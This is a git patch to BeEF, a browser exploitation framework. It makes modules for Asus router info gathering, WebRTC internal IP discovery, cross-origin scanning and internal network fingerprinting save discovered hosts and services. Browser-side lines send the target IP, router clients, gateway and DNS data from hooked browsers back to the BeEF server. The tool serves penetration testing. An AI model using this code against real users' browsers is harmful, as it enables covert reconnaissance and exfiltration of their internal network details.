From df08d99cd526a24ac8d4442dbdfac3889dfb326b Mon Sep 17 00:00:00 2001
From: Brendan Coles <bcoles@gmail.com>
Date: Sun, 18 Jan 2015 13:41:24 +0000
Subject: [PATCH] Report identified hosts to network extension

---
 core/main/handlers/browserdetails.rb          |  7 +++
 .../router/asus_rt_series_get_info/command.js |  3 +-
 .../router/asus_rt_series_get_info/module.rb  | 48 +++++++++++++++++++
 .../host/get_internal_ip_webrtc/command.js    |  3 +-
 modules/host/get_internal_ip_webrtc/module.rb | 22 +++++++++
 .../network/cross_origin_scanner/module.rb    | 19 ++++++++
 .../command.js                                |  2 +-
 .../internal_network_fingerprinting/module.rb | 20 ++++++++
 8 files changed, 121 insertions(+), 3 deletions(-)

diff --git a/core/main/handlers/browserdetails.rb b/core/main/handlers/browserdetails.rb
index 0541d3393..a91e2c937 100644
--- a/core/main/handlers/browserdetails.rb
+++ b/core/main/handlers/browserdetails.rb
@@ -177,6 +177,13 @@ module BeEF
             unless proxy_server.nil?
               BD.set(session_id, 'ProxyServer', "#{proxy_server}")
               proxy_log_string += " [server: #{proxy_server}]"
+              if config.get("beef.extension.network.enable") == true
+                if proxy_server =~ /^([\d\.]+):([\d]+)$/
+                  print_debug("Hooked browser [id:#{zombie.id}] is using a proxy [ip: #{$1}]")
+                  r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => $1, :type => 'Proxy', :cid => 'init')
+                  r.save
+                end
+              end
             end
             BeEF::Core::Logger.instance.register('Zombie', "#{proxy_log_string}", "#{zombie.id}")
           end
diff --git a/modules/exploits/router/asus_rt_series_get_info/command.js b/modules/exploits/router/asus_rt_series_get_info/command.js
index 41628fc89..389724480 100644
--- a/modules/exploits/router/asus_rt_series_get_info/command.js
+++ b/modules/exploits/router/asus_rt_series_get_info/command.js
@@ -31,7 +31,8 @@ beef.execute(function() {
     beef.debug(target_ip + " - gathering info completed");
 
     beef.net.send("<%= @command_url %>", <%= @command_id %>,
-      "clients="  + clients +
+      "ip="       + target_ip +
+      "&clients=" + clients +
       "&wanip="   + wanip   +
       "&netmask=" + netmask +
       "&gateway=" + gateway + 
diff --git a/modules/exploits/router/asus_rt_series_get_info/module.rb b/modules/exploits/router/asus_rt_series_get_info/module.rb
index 0c476a671..d3e58601b 100644
--- a/modules/exploits/router/asus_rt_series_get_info/module.rb
+++ b/modules/exploits/router/asus_rt_series_get_info/module.rb
@@ -13,6 +13,54 @@ class Asus_rt_series_get_info < BeEF::Core::Command
 
   def post_execute
     save({'result' => @datastore['result']})
+
+    configuration = BeEF::Core::Configuration.instance
+    if configuration.get("beef.extension.network.enable") == true
+
+      session_id = @datastore['beefhook']
+      cid = @datastore['cid'].to_i
+
+      # log the network hosts
+      if @datastore['results'] =~ /ip=(.+)&clients=(.+)&wanip=(.+)&netmask=(.+)&gateway=(.+)&dns=(.+)/
+        ip = "#{$1}"
+        clients = "#{$2}"
+        wanip = "#{$3}"
+        netmask = "#{$4}"
+        gateway = "#{$5}"
+        dns_servers = "#{$6}"
+
+        if !ip.nil?
+          print_debug("Hooked browser found Asus RT series router [ip: #{ip}]")
+          r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :type => 'Asus Router', :cid => cid)
+          r.save
+          r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => 'http', :ip => ip, :port => 80, :type => 'HTTP Server', :cid => cid)
+          r.save
+        end
+        clients.scan(/([\d\.]+,[:\dA-F]{17})/).flatten.each do |client|
+          next if client.nil?
+          if client.to_s =~ /^([\d\.]+),([:\dA-F]{17})$/
+            ip = $1
+            mac = $2
+            print_debug("Hooked browser found router client [ip: #{ip}, mac: #{mac}]")
+            r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :mac => mac, :cid => cid)
+            r.save
+          end
+        end
+        if !gateway.nil?
+          print_debug("Hooked browser found WAN gateway server [ip: #{gateway}]")
+          r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => gateway, :type => 'WAN Gateway', :cid => cid)
+          r.save
+        end
+        if !dns_servers.nil? && dns_servers =~ /^([\d\. ]+)$/
+          dns_servers.split(/ /).uniq.each do |dns|
+            print_debug("Hooked browser found DNS server [ip: #{dns}]")
+            r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => dns, :type => 'DNS Server', :cid => cid)
+            r.save
+          end
+        end
+      end
+    end
+
   end
 
 end
diff --git a/modules/host/get_internal_ip_webrtc/command.js b/modules/host/get_internal_ip_webrtc/command.js
index 43e00a02d..277591d05 100755
--- a/modules/host/get_internal_ip_webrtc/command.js
+++ b/modules/host/get_internal_ip_webrtc/command.js
@@ -35,7 +35,8 @@ beef.execute(function() {
 	        if (newAddr in addrs) return;
 	        else addrs[newAddr] = true;
 	        var displayAddrs = Object.keys(addrs).filter(function (k) { return addrs[k]; });
-	        beef.net.send('<%= @command_url %>', <%= @command_id %>, "IP is " + displayAddrs.join(" or perhaps "));
+		beef.debug("Found IPs: "+ displayAddrs.join(","))
+	        beef.net.send('<%= @command_url %>', <%= @command_id %>, "IP is " + displayAddrs.join(","));
 	    }
 	    
 	    function grepSDP(sdp) {
diff --git a/modules/host/get_internal_ip_webrtc/module.rb b/modules/host/get_internal_ip_webrtc/module.rb
index fd2c4dddb..466cbdb12 100755
--- a/modules/host/get_internal_ip_webrtc/module.rb
+++ b/modules/host/get_internal_ip_webrtc/module.rb
@@ -9,6 +9,28 @@ class Get_internal_ip_webrtc < BeEF::Core::Command
     content = {}
     content['Result'] = @datastore['result']
     save content
+
+    configuration = BeEF::Core::Configuration.instance
+    if configuration.get("beef.extension.network.enable") == true
+
+      session_id = @datastore['beefhook']
+      cid = @datastore['cid'].to_i
+
+      # save the network host
+      if @datastore['results'] =~ /IP is ([\d\.,]+)/
+        ips = $1.to_s.split(/,/)
+        if !ips.nil? && !ips.empty?
+          ips.uniq.each do |ip|
+            next unless ip =~ /^[\d\.]+$/
+            next if ip =~ /^0\.0\.0\.0$/
+            print_debug("Hooked browser has network interface #{ip}")
+            r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => ip, :cid => cid)
+            r.save
+          end
+        end
+      end
+    end
+
   end
 
 end
diff --git a/modules/network/cross_origin_scanner/module.rb b/modules/network/cross_origin_scanner/module.rb
index 0c3902bf0..4a080bc21 100644
--- a/modules/network/cross_origin_scanner/module.rb
+++ b/modules/network/cross_origin_scanner/module.rb
@@ -9,6 +9,25 @@ class Cross_origin_scanner < BeEF::Core::Command
     content = {}
     content['result'] = @datastore['result']
     save content
+
+    configuration = BeEF::Core::Configuration.instance
+    if configuration.get("beef.extension.network.enable") == true
+
+      session_id = @datastore['beefhook']
+      cid = @datastore['cid'].to_i
+
+      # log the network service
+      if @datastore['results'] =~ /ip=(.+)&port=([\d]+)&status/
+        ip = $1
+        port = $2
+        print_debug("Hooked browser found HTTP server #{ip}:#{port}")
+        if !ip.nil? && !port.nil?
+          r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => 'http', :ip => ip, :port => port, :type => 'HTTP Server (CORS)', :cid => cid)
+          r.save
+        end
+      end
+    end
+
   end
 
   def self.options
diff --git a/modules/network/internal_network_fingerprinting/command.js b/modules/network/internal_network_fingerprinting/command.js
index 79565b7e3..a11a03862 100644
--- a/modules/network/internal_network_fingerprinting/command.js
+++ b/modules/network/internal_network_fingerprinting/command.js
@@ -244,7 +244,7 @@ beef.execute(function() {
     img.onerror = function() { dom.removeChild(this); }
     img.onload = function() {
       if (this.width == urls[this.id][5] && this.height == urls[this.id][6]) {
-        beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+signature_name+"&url="+escape(this.src));dom.removeChild(this);
+        beef.net.send('<%= @command_url %>', <%= @command_id %>,'proto='+proto+'&ip='+ip+'&port='+port+'&discovered='+signature_name+"&url="+escape(this.src));dom.removeChild(this);
         beef.debug("[Network Fingerprint] Found [" + signature_name + "] with URL [" + escape(this.src) + "]");
       }
     }
diff --git a/modules/network/internal_network_fingerprinting/module.rb b/modules/network/internal_network_fingerprinting/module.rb
index 971e02e83..cb928e86f 100644
--- a/modules/network/internal_network_fingerprinting/module.rb
+++ b/modules/network/internal_network_fingerprinting/module.rb
@@ -24,5 +24,25 @@ class Internal_network_fingerprinting < BeEF::Core::Command
       content['fail'] = 'No devices/applications have been discovered.'
     end
     save content
+
+    configuration = BeEF::Core::Configuration.instance
+    if configuration.get("beef.extension.network.enable") == true
+      if @datastore['results'] =~ /^proto=(.+)&ip=(.+)&port=([\d]+)&discovered=(.+)&url=(.+)/
+        proto = $1
+        ip = $2
+        port = $3
+        discovered = $4
+        url = $5
+        session_id = @datastore['beefhook']
+        cid = @datastore['cid'].to_i
+        if !ip.nil?
+          print_debug("Hooked browser found '#{discovered}' [ip: #{ip}]")
+          r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => proto, :ip => ip, :port => port, :type => discovered, :cid => cid)
+          r.save
+        end
+      end
+
+    end
+
   end
 end